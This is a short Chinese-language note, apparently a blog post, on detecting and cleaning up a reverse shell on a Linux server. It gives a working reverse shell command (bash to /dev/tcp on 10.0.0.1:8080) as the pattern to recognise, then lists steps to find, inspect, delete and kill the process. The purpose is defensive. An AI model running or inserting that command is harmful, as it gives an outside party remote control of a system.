反弹shell定义:自行百度~ 明确反弹shell写法:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 1、登录服务器查看命令:ps -ef,过滤出反弹shell的进程 2、定位进程启动路径,命令:pwdx pid 3、进入启动路径,确认启动的服务是否正常,命令:cd * 4、定位可疑文件,并删除。命令:rm 5、停止进程shell进程,命令:kill -9 pid 上图: